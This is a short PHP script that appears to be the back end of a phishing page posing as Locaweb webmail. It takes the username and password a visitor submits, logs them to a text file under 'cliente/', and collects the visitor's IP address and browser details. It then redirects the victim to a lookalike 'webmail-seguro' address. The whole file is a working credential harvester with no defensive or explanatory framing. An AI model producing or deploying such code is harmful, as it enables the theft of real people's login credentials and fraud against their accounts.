<?php
date_default_timezone_set('America/Sao_Paulo');


$matts .= "Content-type: text/html; charset=iso-8859-1\r\n";
$matts .= "MIME-Version: 1.0\n";

$_user = $_POST['_user'];
$_pass = $_POST['_pass'];
$ip = $_SERVER["REMOTE_ADDR"];
$navegador = $_SERVER['HTTP_USER_AGENT'];
$pcname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$today = date("d/m/y"); 
$hora = date("H:i:s");
$arquivo    = 'cliente/locaweb_' . ".txt";

$stringData =
"
$_pass;$_user

";

    $fp = fopen($arquivo, 'a+');
    if ($fp) {
        fwrite($fp, $stringData);
        fclose($fp);
    }

header( 'Location: https://webmail-seguro.com.br/' ) ;
?>